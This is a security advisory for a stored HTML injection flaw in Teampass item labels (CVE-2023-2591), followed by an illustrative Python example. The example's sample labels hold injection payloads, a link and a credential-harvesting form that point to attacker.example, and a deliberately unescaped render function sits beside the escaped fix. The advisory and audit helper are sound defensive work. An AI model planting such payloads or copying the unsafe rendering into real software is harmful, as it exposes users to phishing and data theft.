PT-2023-20355 · Teampass · Teampass

Published: 2023-05-09 · Updated: 2023-05-15 · CVE-2023-2591

CVSS v3.1: 7.1 (High)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N

Name of the Vulnerable Software and Affected Versions: Teampass versions prior to 3.0.7

Description: The issue is related to improper neutralization of input during web page generation, also known as cross-site scripting. In the GitHub repository nilsteampassnet/teampass, if two users have the same folder access, a malicious user can create an item whose label field is vulnerable to HTML injection. When other users view that item, it may redirect them to the attacker's website or capture their data using a form.

Recommendations: For versions prior to 3.0.7, update to version 3.0.7 to resolve the issue. As a temporary workaround, consider restricting access to items that may contain malicious labels to minimize the risk of exploitation. Avoid using the label field in items until the issue is resolved.
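To illustrate the weakness class described above and the temporary workaround, here is an added example (not Teampass code; the item structure, field names and sample labels are constructed assumptions). It shows a label rendered into HTML without output encoding beside the hardened form, plus an audit helper an administrator could run over stored labels to find items worth restricting until the upgrade.

```python
import html
import re

# Constructed sample items, not data from a Teampass instance. Assumption: the
# application stores the item label verbatim and renders it into the item list page.
SAMPLE_ITEMS = [
    {"id": 1, "label": "Prod DB credentials"},
    {"id": 2, "label": 'VPN <a href="https://attacker.example">login</a>'},
    {"id": 3, "label": '<form action="https://attacker.example/collect">Re-enter password</form>'},
]

# Matches anything that looks like an HTML tag (opening or closing).
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def render_label_unsafe(label: str) -> str:
    """Vulnerable pattern: the label is concatenated into the page as-is,
    so markup in the label becomes part of the DOM seen by other users."""
    return f"<td class='label'>{label}</td>"


def render_label_safe(label: str) -> str:
    """Hardened pattern: encode on output so the label is displayed as text.
    quote=True also encodes double quotes, which matters inside attributes."""
    return f"<td class='label'>{html.escape(label, quote=True)}</td>"


def audit_labels(items) -> list:
    """Return the ids of items whose label contains HTML markup.
    Supports the workaround of restricting access to suspicious items."""
    return [item["id"] for item in items if MARKUP_RE.search(item["label"])]


if __name__ == "__main__":
    for item in SAMPLE_ITEMS:
        print("unsafe:", render_label_unsafe(item["label"]))
        print("safe:  ", render_label_safe(item["label"]))
    print("items to review:", audit_labels(SAMPLE_ITEMS))
```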

Tags: XSS, Code Injection

Weakness Enumeration

Related Identifiers: CVE-2023-2591, GHSA-PRJ5-2G2P-X2MW

Affected Products: Teampass